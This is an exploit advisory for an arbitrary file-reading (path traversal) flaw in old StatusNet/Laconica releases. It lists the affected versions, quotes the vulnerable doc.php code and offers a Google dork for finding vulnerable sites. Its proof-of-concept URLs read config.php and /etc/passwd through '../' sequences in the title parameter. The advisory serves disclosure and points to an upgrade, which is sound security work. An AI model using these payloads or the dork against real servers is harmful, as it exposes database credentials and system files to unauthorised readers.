+ StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
# Date:
- 10/10/2013
# Exploit Author:
- spiderboy
# Vendor Homepage:
- http://status.net/
# Software Links:
- http://status.net/laconica-0.7.4.tar.gz
- http://status.net/statusnet-0.8.2.tar.gz
- http://status.net/statusnet-0.9.0beta3.tar.gz
# Version:
- Branch 0.7.X : <= 0.7.4
- Branch 0.8.X : <= 0.8.2
- Branch 0.9.X : <= 0.9.0beta3
# Tested on:
- Unix/Linux
# Category:
- Webapps
# Platform:
- php
# Advisories :
- http://status.net/wiki/Security_alert_0000002
- http://osvdb.org/show/osvdb/95586
# Google Dork:
- "It runs the StatusNet microblogging software, version 0.8.2"
# Vendor product description:
- Free and Open Source social software
# Vulnerable code:
- actions/doc.php:
function handle($args)
$this->title= $this->trimmed('title');
$this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
if (!file_exists($this->filename)) {
$this->clientError(_('No such document.'));
[1] : No check on user-supplied parameter $this->title
# Proof of concept:
- http://[host]/index.php?action=doc&title=../config.php
- http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd
# Solution:
- Upgrade to latest version : http://status.net/download